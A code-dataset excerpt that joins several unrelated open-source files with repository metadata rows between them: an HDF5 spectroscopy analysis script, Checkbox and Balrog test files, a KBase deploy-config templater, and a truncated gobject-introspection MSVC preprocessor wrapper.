print ' with file_name={}'.format(file_name),
print ' {} events to process.'.format(n_events)
deconvolver = wiener.Deconcolver(snr_dset.value, response)
for i_evt in range(n_events):
deconv_time_signal_dset[i_evt, :] = deconvolver.deconvolve(
time_signal_dset[i_evt, :])
update_progress(i_evt, n_events, verbose)
print ''
deconv_time_signal_dset.attrs['time_stamp'] = time.time()
# Calculate the center of mass of the streak peak
time_com_dset = make_dataset(h5, 'streak_peak_center', (n_events, ))
photo_line_intensity_dset = make_dataset(h5, 'streak_peak_integral',
(n_events, ))
if older(time_com_dset, [deconv_time_signal_dset,
Timer_object(1443006988)]):
if verbose > 0:
print 'Calculating streak peak center in time.',
print ' In "update_with_noise_and_response()"',
print ' with file_name={}'.format(file_name)
streak_sl = slice(np.searchsorted(time_scale, streak_time_roi[0]),
np.searchsorted(time_scale, streak_time_roi[1],
side='right'))
time_scale_streak = time_scale[streak_sl]
####
# Center of mass calculation
# for i_evt in range(n_events):
# time_com_dset[i_evt] = get_com(
# time_scale_streak,
# deconv_time_signal_dset[i_evt, streak_sl])
# update_progress(i_evt, n_events, verbose)
####
# Fit of Gaussian
deconv_time_signal = deconv_time_signal_dset.value
time_com = np.zeros(time_com_dset.shape)
photo_line_intensity = np.zeros(photo_line_intensity_dset.shape)
mean_signal = deconv_time_signal[:, streak_sl].mean(axis=0)
mod = lmfit.models.GaussianModel()
params = lmfit.Parameters()
params.add_many(('amplitude', 1, True, 0),
('center', time_scale_streak[np.argmax(mean_signal)],
True, min(time_scale_streak), max(time_scale_streak)),
('sigma', 1e-3, True, 0))
# fit to mean in order to get start parameters for the shot fits
out = mod.fit(mean_signal, x=time_scale_streak, params=params)
for k in params:
params[k].value = out.params[k].value
for i_evt in range(n_events):
out = mod.fit(deconv_time_signal[i_evt, streak_sl],
params, x=time_scale_streak)
time_com[i_evt] = out.params['center'].value
photo_line_intensity[i_evt] = out.params['amplitude'].value
update_progress(i_evt, n_events, verbose)
if plot:
time_scale_streak = time_scale[streak_sl]
plt.figure('peak finding time domain')
plt.clf()
plt.plot(time_scale_streak, mean_signal)
plt.plot(time_scale_streak, out.best_fit)
if verbose > 0:
print ''
time_com_dset[:] = time_com
time_com_dset.attrs['time_stamp'] = time.time()
photo_line_intensity_dset[:] = photo_line_intensity
photo_line_intensity_dset.attrs['time_stamp'] = time.time()
h5.close()
def update_with_time_to_energy_conversion(file_name, plot=False, verbose=0):
""" Make derived data based on time to energy conversion."""
update_with_noise_and_response(file_name, plot, verbose)
h5 = open_hdf5_file(file_name, plot, verbose)
raw_group = h5['raw']
n_events = raw_group['event_time_s'].shape[0]
deconv_time_signal_dset = h5['filtered_time_signal']
energy_scale_dset = make_dataset(h5, 'energy_scale_eV',
energy_scale_eV.shape)
energy_trace_dset = make_dataset(h5, 'energy_signal',
(n_events, len(energy_scale_eV)))
check_tof_to_energy_conversion_matrix(verbose=verbose)
with h5py.File(tof_to_energy_conversion_file_name, 'r') as tof_to_e_h5:
if older(energy_scale_dset, [tof_to_e_h5['matrix'],
deconv_time_signal_dset,
Timer_object(1443190000)]):
if verbose > 0:
print 'Updating time to energy conversion.',
print ' In "update_with_time_to_energy_conversion()"',
print ' with {}'.format(file_name)
# Get the transformation matrix from file
M = tof_to_e_h5['matrix'].value
# Update the energy scale
energy_scale_dset[:] = tof_to_e_h5['energy_scale_eV'].value
energy_scale_dset.attrs['time_stamp'] = time.time()
# Get the photon energy prediction parameters
params = (tof_to_energy.photon_energy_params() +
tof_to_energy.tof_prediction_params())
for k in params:
params[k].value = tof_to_e_h5[k].value
if verbose > 0:
print 'Computing energy spectra.'
for i_evt in range(n_events):
# Energy spectra
energy_trace_dset[i_evt, :] = M.dot(
deconv_time_signal_dset[i_evt, :])
update_progress(i_evt, n_events, verbose)
if verbose > 0:
print ''
energy_trace_dset.attrs['time_stamp'] = time.time()
# Calculate energy trace properties
spectral_properties_group = h5.require_group('spectral_properties')
spectral_center_dset = make_dataset(spectral_properties_group,
'center_eV', (n_events, ))
spectral_width_dset = make_dataset(spectral_properties_group,
'width_eV', (n_events, ))
spectral_threshold_dset = make_dataset(spectral_properties_group,
'threshold', (n_events, ))
spectral_gaussian_center_dset = make_dataset(spectral_properties_group,
'gaussian_center',
(n_events,))
if older(spectral_center_dset, [energy_trace_dset,
Timer_object(1443421560)]):
energy_scale = energy_scale_dset[:]
sl = slice(np.searchsorted(energy_scale, 75),
np.searchsorted(energy_scale, 125))
energy_scale = energy_scale[sl]
model = lmfit.models.GaussianModel()
if verbose > 0:
print 'Calculating spectral center and width:',
print 'In "update_with_time_to_energy_conversion()"',
print 'with {}'.format(file_name)
for i_evt in range(n_events):
energy_trace = energy_trace_dset[i_evt, sl]
t_start, t_end, spectral_threshold_dset[i_evt] = \
get_trace_bounds(energy_scale,
energy_trace,
threshold=8e-5,
min_width=3,
# useRel=True,
# threshold_rel=0.3
)
center = (t_start + t_end) / 2
spectral_center_dset[i_evt] = center
width = t_end - t_start
spectral_width_dset[i_evt] = width
# Calculate center of mass
peak_sl = slice(energy_scale.searchsorted(t_start - width/2),
energy_scale.searchsorted(t_end + width/2,
side='right'))
peak_trace = energy_trace[peak_sl]
peak_scale = energy_scale[peak_sl]
# spectral_com_dset[i_evt] = (np.sum(peak_scale * peak_trace) /
# np.sum(peak_trace))
if len(peak_trace) > 3:
out = model.fit(peak_trace, x=peak_scale,
center=center, sigma=width/4,
amplitude=peak_trace.max() * width / 2)
spectral_gaussian_center_dset[i_evt] = out.values['center']
else:
spectral_gaussian_center_dset[i_evt] = np.nan
update_progress(i_evt, n_events, verbose)
spectral_center_dset.attrs['time_stamp'] = time.time()
spectral_width_dset.attrs['time_stamp'] = time.time()
spectral_threshold_dset.attrs['time_stamp'] = time.time()
spectral_gaussian_center_dset.attrs['time_stamp'] = time.time()
if plot:
selected_shots = list(np.linspace(0, n_events, 16, endpoint=False))
plt.figure('peak properties')
plt.clf()
_, ax_list = plt.subplots(4, 4, sharex=True, sharey=True,
num='peak properties')
energy_scale = energy_scale_dset[:]
sl = slice(np.searchsorted(energy_scale, 75),
np.searchsorted(energy_scale, 130))
energy_scale = energy_scale[sl]
for i, shot in enumerate(selected_shots):
energy_trace = energy_trace_dset[shot, :]
ax = ax_list.flatten()[i]
# plt.plot(energy_scale - pe_energy_prediction_dset[shot],
ax.plot(energy_scale, energy_trace[sl])
c = spectral_center_dset[shot]
w = spectral_width_dset[shot]
th = spectral_threshold_dset[shot]
ax.plot([c-w/2, c+w/2], [th] * 2)
# Calculate main photoline area
main_photoline_area = make_dataset(spectral_properties_group,
'main_photoline_area', (n_events, ))
if older(main_photoline_area, energy_trace_dset):
if verbose:
print 'Computing photoline area'
e_scale = energy_scale_dset.value
dE = np.mean(np.diff(e_scale))
e_slice = slice(np.searchsorted(e_scale, 55), None)
for i_evt in range(n_events):
raw_A, _ = area_fill.zero_crossing_area(
energy_trace_dset[i_evt, e_slice])
main_photoline_area[i_evt] = raw_A * dE
update_progress(i_evt, n_events, verbose)
time_stamp_object(main_photoline_area)
##########
# Calculate electron energy prediction
e_energy_prediction_params_group = make_group(h5,
'e_energy_prediction_params')
if older(e_energy_prediction_params_group, [spectral_gaussian_center_dset,
Timer_object(1444931900)]):
if verbose > 0:
print 'Fit the electron energy prediction parameters.',
print 'In "update_with_time_to_energy_conversion()"',
print 'with {}'.format(file_name)
selection = np.isfinite(spectral_gaussian_center_dset.value)
# &
# (0.4 < raw_group['phase_cavity_times'][:, 0]) &
# (raw_group['phase_cavity_times'][:, 0] < 1.1))
spectral_gaussian_center = spectral_gaussian_center_dset[selection]
if len(spectral_gaussian_center) == 0:
return
var_dict = {
'l3_energy': raw_group['energy_L3_MeV'][selection],
'bc2_energy': h5['energy_BC2_MeV'][selection],
# 'fee': h5['fee_mean'][selection],
'e_energy': spectral_gaussian_center
}
prediction_params = \
tof_to_energy.e_energy_prediction_model_start_params(**var_dict)
try:
res = lmfit.minimize(tof_to_energy.e_energy_prediction_model,
prediction_params,
kws=var_dict)
fit_worked = True
except:
fit_worked = False
if verbose > 0 and fit_worked:
print '\nPrediction params:'
lmfit.report_fit(res)
# Create or update the parameters from the fit in the group
for k, v in prediction_params.iteritems():
d = e_energy_prediction_params_group.require_dataset(
k, (), np.float)
d[()] = v.value if fit_worked else np.nan
# Remove old parameters that should not be there
for k in set(e_energy_prediction_params_group.keys()).difference(
set(prediction_params.keys())):
del e_energy_prediction_params_group[k]
e_energy_prediction_params_group.attrs[time_stamp] = time.time()
if plot:
deviation = tof_to_energy.e_energy_prediction_model(
prediction_params, **var_dict)
plt.figure('e energy prediction {}'.format(
h5.filename.split('/')[-1]))
plt.clf()
plt.subplot(221)
# plt.plot(spectral_gaussian_center, deviation, '.')
plt.scatter(spectral_gaussian_center, deviation,
s=4, c=h5['energy_BC2_MeV'][selection],
linewidths=(0,), alpha=1)
plt.xlabel('electron energy (eV)')
plt.ylabel('prediction residual (eV)')
x_range = plt.xlim()
y_range = plt.ylim()
img, _, _ = np.histogram2d(spectral_gaussian_center, deviation,
bins=2**7, range=[x_range, y_range])
img = img.T
plt.subplot(222)
plt.imshow(img, aspect='auto', interpolation='none',
origin='lower', extent=x_range + y_range)
hist, hist_edges = np.histogram(deviation,
bins=2**5, range=(-3, 3))
hist_centers = (hist_edges[: -1] + hist_edges[1:])/2
plt.subplot(223)
gauss_model = lmfit.models.GaussianModel()
fit_out = gauss_model.fit(hist, x=hist_centers)
lmfit.report_fit(fit_out)
plt.bar(hist_edges[:-1], hist, width=np.diff(hist_edges))
plt.plot(hist_centers, fit_out.best_fit, 'r', linewidth=2)
plt.subplot(224)
plt.plot(spectral_gaussian_center, h5['energy_BC2_MeV'][selection],
'.')
def update_with_energy_prediction(file_name, plot=False, verbose=0):
update_with_time_to_energy_conversion(file_name, plot, verbose)
h5 = open_hdf5_file(file_name, plot, verbose)
raw_group = h5['raw']
n_events = raw_group['event_time_s'].shape[0]
prediction_map = {'117': 'h5_files/run118_all.h5',
'114': 'h5_files/run115_all.h5',
'113': 'h5_files/run112_all.h5',
'108': 'h5_files/run109_all.h5',
'101': 'h5_files/run100_all.h5',
'102': 'h5_files/run100_all.h5'}
pe_energy_prediction_dset = make_dataset(
h5, 'photoelectron_energy_prediction_eV', (n_events,))
spectral_properties_group = h5['spectral_properties']
# spectral_gaussian_center_dset = spectral_properties_group[
# 'gaussian_center']
fee_dset = h5['fee_mean']
energy_BC2_dset = h5['energy_BC2_MeV']
energy_L3_dset = raw_group['energy_L3_MeV']
for k, v in prediction_map.iteritems():
if k in file_name:
update_with_time_to_energy_conversion(v, plot=False,
verbose=verbose-1)
ref_h5 = open_hdf5_file(file_name)
e_energy_prediction_params_group = \
ref_h5['e_energy_prediction_params']
break
else:
e_energy_prediction_params_group = h5['e_energy_prediction_params']
if older(pe_energy_prediction_dset, [e_energy_prediction_params_group,
fee_dset,
energy_BC2_dset,
raw_group,
Timer_object(1444981500)]):
if verbose > 0:
print 'Updating energy prediction.',
print ' In "update_with_energy_prediction()" with {}'.format(
file_name)
prediction_params = lmfit.Parameters()
for k in e_energy_prediction_params_group:
prediction_params.add(k, e_energy_prediction_params_group[k][()])
var_dict = {
'l3_energy': energy_L3_dset.value,
'bc2_energy': energy_BC2_dset.value,
'fee': fee_dset.value
}
try:
pe_energy_prediction_dset[:] = \
tof_to_energy.e_energy_prediction_model(prediction_params,
**var_dict)
except:
pe_energy_prediction_dset[:] = np.nan
pe_energy_prediction_dset.attrs[time_stamp] = time.time()
##########
# Make the christmas three histogram
n_spectral_center_bins = 2**7
n_spectral_width_bins = 2**7
spectral_center_axis_dset = make_dataset(spectral_properties_group,
'center_axis_eV',
(n_spectral_center_bins, ))
spectral_width_axis_dset = make_dataset(spectral_properties_group,
'width_axis_eV',
(n_spectral_width_bins, ))
spectral_histogram_dset = make_dataset(spectral_properties_group,
'histogram',
(n_spectral_width_bins,
n_spectral_center_bins))
spectral_center_dset = spectral_properties_group['center_eV']
spectral_width_dset = spectral_properties_group['width_eV']
pct_filter_dset = h5['pct_filter']
if older(spectral_histogram_dset, [spectral_center_dset,
spectral_width_dset,
pe_energy_prediction_dset,
pct_filter_dset,
Timer_object(2444203160)]):
if verbose > 0:
print 'Making the christmas tree plot.',
print ' In "update_with_energy_prediction()"',
print ' with {}'.format(file_name)
spectral_width_axis_dset[:] = np.linspace(0, 35, n_spectral_width_bins)
spectral_width_axis_dset.attrs['time_stamp'] = time.time()
spectral_center_axis_dset[:] = np.linspace(-20, 20,
n_spectral_center_bins)
spectral_center_axis_dset.attrs['time_stamp'] = time.time()
# I = (pct_filter_dset.value &
# (-0.1 < raw_group['phase_cavity_times'][:, 1]) &
## (raw_group['phase_cavity_times'][:, 1] < 0.05) &
## (0.75 < raw_group['phase_cavity_times'][:, 0]) &
## (raw_group['phase_cavity_times'][:, 0] < 0.85) &
# (0.065 < raw_group['power_meter_V'].value) &
# (raw_group['power_meter_V'].value < 0.1))
I = np.ones(pct_filter_dset.shape, dtype=bool)
hist = aol_plotting.center_histogram_2d(
spectral_center_dset[I] - pe_energy_prediction_dset[I],
spectral_width_dset[I],
spectral_center_axis_dset[:],
spectral_width_axis_dset[:])
hist[hist == 0] = np.nan
spectral_histogram_dset[:] = hist
spectral_histogram_dset.attrs['time_stamp'] = time.time()
if plot:
plt.figure('christmas tree {}'.format(h5.filename.split('/')[-1]))
plt.clf()
plt.imshow(spectral_histogram_dset[:], aspect='auto',
interpolation='none', origin='lower',
extent=(np.min(spectral_center_axis_dset),
np.max(spectral_center_axis_dset),
np.min(spectral_width_axis_dset),
np.max(spectral_width_axis_dset)))
plt.xlabel('center (eV)')
plt.ylabel('width (eV)')
plt.colorbar()
plt.savefig('figures/christmas_tree_{}.png'.format(
h5.filename.split('/')[-1].split('.')[0]))
h5.close()
def load_file(file_name, plot=False, verbose=0):
""" Load file and make sure it is up to date."""
# if verbose > 0:
# print 'Entering "load_file()" with file_name={}'.format(file_name)
update_with_energy_prediction(file_name, plot, verbose)
h5 = open_hdf5_file(file_name, plot, verbose)
raw_group = h5['raw']
n_events = raw_group['event_time_s'].shape[0]
if verbose > 0:
print 'File {} processed.'.format(h5.file)
print 'It contains', n_events, 'events.'
if verbose > 1:
list_hdf5_content(h5)
return h5
def touch_all_files(verbose=2):
file_names = ['/'.join([data_dir, f]) for f in os.listdir(data_dir) if
f.startswith('run') and f.endswith('_all.h5')]
for name in file_names:
load_file(name, verbose=verbose)
if __name__ == '__main__':
# Parset the command line.
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--hdf5_file', type=str,
default='h5_files/run108_all.h5',
help='Path to hdf5 file to process')
parser.add_argument('--plot', action='store_true',
help='Display plots. Default: no plots.')
parser.add_argument('-v', '--verbose', action='count',
help='increase output verbosity')
args = parser.parse_args()
# Unpack the parser arguments.
hdf5_file = args.hdf5_file
plot = args.plot
verbose = args.verbose
# If plotting is requested, ryn pyplot in the interactive mode.
if plot:
plt.ion()
if verbose > 0:
print 'Get the noise spectrum just to make sure it is up to date.'
get_nois_spectrum(plot=plot, verbose=verbose)
# Load the given file.
if verbose > 0:
print 'Load the requested file: {}'.format(hdf5_file)
h5 = load_file(hdf5_file, verbose=verbose, plot=plot)
# Get the raw group of the file.
raw_group = h5['raw']
# Number of events in the file.
n_events = len(raw_group['event_time_s'])
# Time trace rellated information.
raw_time = raw_group['time_scale'].value
raw_traces_dset = raw_group['time_signal']
filtered_traces = h5['filtered_time_signal']
# Pulse energy
raw_fee_dset = raw_group['FEE_energy_mJ']
n_fee = raw_fee_dset.shape[1]
# frequency domain
freq_axis = h5['fft_freq_axis'].value
fft_mean = h5['fft_spectrum_mean'].value
snr = h5['snr_spectrum'].value
if plot and False:
if verbose > 0:
print 'Plotting fee correlations.'
plt.figure('fee')
plt.clf()
ax = None
for i in range(n_fee):
for k in range(n_fee):
ax = plt.subplot(n_fee, n_fee, i + k*n_fee + 1,
sharex=ax, sharey=ax)
ax.plot(raw_fee_dset[:, i], raw_fee_dset[:, k], '.')
if i > 0:
plt.setp(ax.get_yticklabels(), visible=False)
if k < n_fee-1:
plt.setp(ax.get_xticklabels(), visible=False)
plt.xlim(xmin=0)
plt.ylim(ymin=0)
if verbose > 0:
print 'Plotting fee histogram.'
plt.figure('fee histogram')
plt.clf()
plt.hist(h5['fee_mean'].value, bins=100)
if plot:
if verbose > 0:
print 'Plot signal maximium histogram.'
plt.figure('signal hist')
plt.clf()
plt.hist(h5['max_signal'], bins=100)
if plot:
if verbose > 0:
print 'Plot spectr'
plt.figure('fft')
plt.clf()
plt.semilogy(freq_axis, fft_mean, label='average spectrum')
plt.semilogy(freq_axis, snr, label='snr')
plt.legend(loc='best')
# Plot some traces
if plot:
if verbose > 0:
print 'Plotting traces'
trace_fig = plt.figure('traces {}'.format(hdf5_file))
trace_fig.clf()
raw_mean_tr = raw_traces_dset.value.mean(0)
deconv_mean_tr = filtered_traces.value.mean(0)
rand_event = np.random.randint(n_events)
response, _ = get_response(plot=False, verbose=verbose)
plt.plot(raw_time, raw_traces_dset[rand_event, :],
label='single trace')
plt.plot(raw_time, filtered_traces[rand_event, :],
label='Deconv single trace')
plt.plot(raw_time, raw_mean_tr, label='mean trace')
plt.plot(raw_time, deconv_mean_tr,
label='Deconv mean')
plt.legend(loc='best')
# Plot the phase cavity times
pct = raw_group['phase_cavity_times']
plt.figure('Phase cavity times')
plt.clf()
# pc_selection = (np.isfinite(np.sum(pct, axis=1)) &
# (pct[:, 0] > -2) & (pct[:, 0] < 2) &
# (pct[:, 1] > -2) & (pct[:, 1] < 2))
# (pct[:, 0] > -50) & (pct[:, 0] < 50))
pc_selection = h5['pct_filter'].value
for i in range(2):
plt.subplot(1, 3, i+1)
plt.title('Time {}'.format(i))
hist, hist_edges = np.histogram(pct[pc_selection, i], bins=100)
plt.bar(hist_edges[: -1], hist, width=np.diff(hist_edges))
plt.subplot(133)
plt.plot(pct[pc_selection, 0], pct[pc_selection, 1], '.')
# Plot energy traces and photon energy diagnostics
pe_energy_dset = h5['photoelectron_energy_prediction_eV']
energy_scale = h5['energy_scale_eV'][:]
energy_signal_dset = h5['energy_signal']
selected_shots = np.linspace(0, n_events, 100, endpoint=False, dtype=int)
plt.figure('Energy spectra')
plt.clf()
ax1 = plt.subplot(121)
ax2 = plt.subplot(122)
dy = 1e-5
for i, shot in enumerate(selected_shots):
ax1.plot(energy_scale, energy_signal_dset[shot, :] + dy * i)
ax2.plot(energy_scale - pe_energy_dset[shot],
energy_signal_dset[shot, :] + dy * i)
ax2.set_xlim(-20, 25)
# %%
# Plot the photoline area
plt.figure('photoline area')
plt.clf()
spectral_properties_group = h5['spectral_properties']
main_photoline_area = spectral_properties_group[
'main_photoline_area'].value
fee = h5['fee_mean'].value
I = np.isfinite(main_photoline_area) & np.isfinite(fee)
p = np.polyfit(fee[I], main_photoline_area[I], 2)
fee_ax = np.linspace(min(fee[I]), max(fee[I]), 2**5)
plt.subplot(121)
plt.plot(fee, main_photoline_area, '.')
plt.plot(fee_ax, np.polyval(p, fee_ax), 'r')
plt.subplot(122)
plt.hist2d(fee[I], main_photoline_area[I], bins=2**7)
plt.plot(fee_ax, np.polyval(p, fee_ax), 'r')
|
gpl-2.0
| 6,914,218,429,216,574,000 | 37.523372 | 79 | 0.554571 | false |
jds2001/ocp-checkbox
|
plainbox/plainbox/impl/providers/test_checkbox.py
|
1
|
1330
|
# This file is part of Checkbox.
#
# Copyright 2012, 2013 Canonical Ltd.
# Written by:
# Zygmunt Krynicki <zygmunt.krynicki@canonical.com>
#
# Checkbox is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Checkbox is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Checkbox. If not, see <http://www.gnu.org/licenses/>.
"""
plainbox.impl.test_checkbox
===========================
Test definitions for plainbox.impl.checkbox module
"""
from plainbox.impl.providers.checkbox import CheckBoxAutoProvider
from plainbox.testing_utils.testcases import TestCaseWithParameters
class TestCheckBox(TestCaseWithParameters):
parameter_names = ('job',)
@classmethod
def get_parameter_values(cls):
for job in CheckBoxAutoProvider().get_builtin_jobs():
yield (job,)
def test_job_resource_expression(self):
self.parameters.job.get_resource_program()
|
gpl-3.0
| -1,121,494,862,318,903,400 | 32.25 | 70 | 0.734586 | false |
tieu/balrog
|
auslib/test/admin/views/test_history.py
|
1
|
7025
|
import json
from auslib.global_state import dbo
from auslib.test.admin.views.base import ViewTest
class TestHistoryView(ViewTest):
def testFieldViewBadValuesBadTable(self):
url = '/history/view/notatable/1/whatever'
ret = self.client.get(url)
self.assertStatusCode(ret, 400)
self.assertTrue('Bad table' in ret.data)
def testFieldViewBadValuesBadChangeId(self):
url = '/history/view/permission/9999/whatever'
ret = self.client.get(url)
self.assertStatusCode(ret, 404)
self.assertTrue('Bad change_id' in ret.data)
def testFieldViewCheckIntegerValue(self):
data = json.dumps(dict(detailsUrl='InbhalInt', fakePartials=True, schema_version=1, name="d", hashFunction="sha512"))
ret = self._post(
'/releases/d',
data=dict(data=data, product='d', data_version=1)
)
self.assertStatusCode(ret, 200)
table = dbo.releases.history
query = table.t.count()
count, = query.execute().first()
self.assertEqual(count, 1)
row, = table.select()
change_id = row['change_id']
url = '/history/view/release/%d/data_version' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 200)
def testFieldViewBadValuesBadField(self):
ret = self._put('/users/bob/permissions/admin', data=dict(options=json.dumps(dict(products=["a"]))))
self.assertStatusCode(ret, 201)
table = dbo.permissions.history
row, = table.select(order_by=[table.change_id.desc()], limit=1)
change_id = row['change_id']
url = '/history/view/permission/%d/notafield' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 400)
self.assertTrue('Bad field' in ret.data)
def testFieldViewRelease(self):
# add a release
data = json.dumps(dict(detailsUrl='blah', fakePartials=True, schema_version=1, name="d", hashFunction="sha512"))
ret = self._post(
'/releases/d',
data=dict(data=data, product='d', data_version=1)
)
self.assertStatusCode(ret, 200)
table = dbo.releases.history
query = table.t.count()
count, = query.execute().first()
self.assertEqual(count, 1)
row, = table.select()
change_id = row['change_id']
url = '/history/view/release/%d/data' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 200)
self.assertEqual(json.loads(ret.data), json.loads("""
{
"name": "d",
"schema_version": 1,
"detailsUrl": "blah",
"fakePartials": true,
"hashFunction": "sha512",
"platforms": {
"p": {
"locales": {
"d": {
"complete": {
"filesize": 1234,
"from": "*",
"hashValue": "abc"
}
}
}
}
}
}
"""))
data = json.dumps(dict(detailsUrl='blah', fakePartials=False, schema_version=1, name="d", hashFunction="sha512"))
ret = self._post(
'/releases/d',
data=dict(data=data, product='d', data_version=2)
)
self.assertStatusCode(ret, 200)
table = dbo.releases.history
row, = table.select(order_by=[table.change_id.desc()], limit=1)
change_id = row['change_id']
url = '/history/diff/release/%d/data' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 200)
self.assertTrue('"fakePartials": true' in ret.data)
self.assertTrue('"fakePartials": false' in ret.data)
def testFieldViewDiffRelease(self):
# Add release history for d
data = json.dumps(dict(detailsUrl='blahblah', fakePartials=False, schema_version=1, name="d", hashFunction="sha512"))
ret = self._post(
'/releases/d',
data=dict(data=data, product='d', data_version=1)
)
self.assertStatusCode(ret, 200)
# Let's add a separate release say for b(already present in the setUp)
data = json.dumps(dict(detailsUrl='blahagain', fakePartials=True, schema_version=1, name="b", hashFunction="sha512"))
ret = self._post(
'/releases/b',
data=dict(data=data, product='b', data_version=1)
)
self.assertStatusCode(ret, 200)
# Let's add another release history for d
data = json.dumps(dict(detailsUrl='blahblahblah', fakePartials=True, schema_version=1, name="d", hashFunction="sha512"))
ret = self._post(
'/releases/d',
data=dict(data=data, product='d', data_version=2)
)
self.assertStatusCode(ret, 200)
table = dbo.releases.history
row, = table.select(order_by=[table.change_id.desc()], limit=1)
change_id = row['change_id']
url = '/history/diff/release/%d/data' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 200)
# Checks should give diff for versions of d
self.assertTrue('"detailsUrl": "blahblahblah"' in ret.data)
self.assertTrue('"detailsUrl": "blahblah"' in ret.data)
self.assertFalse('"detailsUrl": "blahagain"' in ret.data)
self.assertTrue('"fakePartials": true' in ret.data)
self.assertTrue('"fakePartials": false' in ret.data)
# Add another version for b
data = json.dumps(dict(detailsUrl='blahagainblahagain', fakePartials=False, schema_version=1, name="b", hashFunction="sha512"))
ret = self._post(
'/releases/b',
data=dict(data=data, product='b', data_version=2)
)
self.assertStatusCode(ret, 200)
table = dbo.releases.history
row, = table.select(order_by=[table.change_id.desc()], limit=1)
change_id = row['change_id']
url = '/history/diff/release/%d/data' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 200)
# Checks should now give diff for versions of b
self.assertTrue('"detailsUrl": "blahagainblahagain"' in ret.data)
self.assertTrue('"detailsUrl": "blahagain"' in ret.data)
self.assertFalse('"detailsUrl": "blahblahblah"' in ret.data)
self.assertTrue('"fakePartials": true' in ret.data)
self.assertTrue('"fakePartials": false' in ret.data)
def testFieldViewPermission(self):
# Add a permission
ret = self._put('/users/bob/permissions/admin', data=dict(options=json.dumps(dict(products=["a"]))))
self.assertStatusCode(ret, 201)
table = dbo.permissions.history
row, = table.select(order_by=[table.timestamp.desc()], limit=1)
change_id = row['change_id']
url = '/history/view/permission/%d/options' % change_id
ret = self.client.get(url)
self.assertStatusCode(ret, 200)
self.assertEqual(json.loads(ret.data), {"products": ["a"]})
|
mpl-2.0
| -1,618,251,931,530,158,600 | 36.169312 | 135 | 0.593452 | false |
kbaseapps/kb_phylogenomics
|
scripts/prepare_deploy_cfg.py
|
1
|
1496
|
import sys
import os
import os.path
from jinja2 import Template
try:
from ConfigParser import ConfigParser # py2
except:
from configparser import ConfigParser # py3
import StringIO
if __name__ == "__main__":
if len(sys.argv) != 3:
print("Usage: <program> <deploy_cfg_template_file> <file_with_properties>")
print("Properties from <file_with_properties> will be applied to <deploy_cfg_template_file>")
print("template which will be overwritten with .orig copy saved in the same folder first.")
sys.exit(1)
file = open(sys.argv[1], 'r')
text = file.read()
t = Template(text)
config = ConfigParser()
if os.path.isfile(sys.argv[2]):
config.read(sys.argv[2])
elif "KBASE_ENDPOINT" in os.environ:
kbase_endpoint = os.environ.get("KBASE_ENDPOINT")
props = "[global]\n" + \
"job_service_url = " + kbase_endpoint + "/userandjobstate\n" + \
"workspace_url = " + kbase_endpoint + "/ws\n" + \
"shock_url = " + kbase_endpoint + "/shock-api\n" + \
"kbase_endpoint = " + kbase_endpoint + "\n"
config.readfp(StringIO.StringIO(props))
else:
raise ValueError('Neither ' + sys.argv[2] + ' file nor KBASE_ENDPOINT env-variable found')
props = dict(config.items("global"))
output = t.render(props)
with open(sys.argv[1] + ".orig", 'w') as f:
f.write(text)
with open(sys.argv[1], 'w') as f:
f.write(output)
|
mit
| -3,337,510,685,604,075,000 | 38.368421 | 101 | 0.601604 | false |
anthrotype/gobject-introspection
|
giscanner/msvccompiler.py
|
1
|
3827
|
# -*- Mode: Python -*-
# GObject-Introspection - a framework for introspecting GObject libraries
# Copyright (C) 2014 Chun-wei Fan
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
#
import os
import distutils
from distutils.errors import (DistutilsExecError, CompileError, LibError,
LinkError, UnknownFileError)
from distutils.ccompiler import CCompiler, gen_preprocess_options
from distutils.dep_util import newer
# Distutil's MSVCCompiler does not provide a preprocess()
# Implementation, so do our own here.
def get_msvc_compiler():
return MSVCCompiler()
class MSVCCompiler(distutils.msvccompiler.MSVCCompiler):
def __init__(self, verbose=0, dry_run=0, force=0):
CCompiler.__init__(self, verbose, dry_run, force)
self.__paths = []
self.__arch = None # deprecated name
if os.name == 'nt':
if isinstance(self, distutils.msvc9compiler.MSVCCompiler):
self.__version = distutils.msvc9compiler.VERSION
self.initialized = False
self.preprocess_options = None
def preprocess(self,
source,
output_file=None,
macros=None,
include_dirs=None,
extra_preargs=None,
extra_postargs=None):
if self.initialized is False:
self.initialize()
(_, macros, include_dirs) = \
self._fix_compile_args(None, macros, include_dirs)
pp_opts = gen_preprocess_options(macros, include_dirs)
preprocess_options = ['-E']
source_basename = None
if output_file is not None:
preprocess_options.append('-P')
source_basename = self._get_file_basename(source)
cpp_args = self.cc.split()
if extra_preargs is not None:
cpp_args[:0] = extra_preargs
if extra_postargs is not None:
preprocess_options.extend(extra_postargs)
cpp_args.extend(preprocess_options)
cpp_args.extend(pp_opts)
cpp_args.append(source)
# We need to preprocess: either we're being forced to, or the
# source file is newer than the target (or the target doesn't
# exist).
if self.force or output_file is None or newer(source, output_file):
try:
self.spawn(cpp_args)
except (DistutilsExecError, msg):
print(msg)
raise CompileError
# The /P option for the MSVC preprocessor will output the results
# of the preprocessor to a file, as <source_without_extension>.i,
# so in order to output the specified filename, we need to rename
# that file
if output_file is not None:
if output_file != source_basename + '.i':
os.rename(source_basename + '.i', output_file)
def _get_file_basename(self, filename):
if filename is None:
return None
if filename.rfind('.') == -1:
return filename[filename.rfind('\\') + 1:]
else:
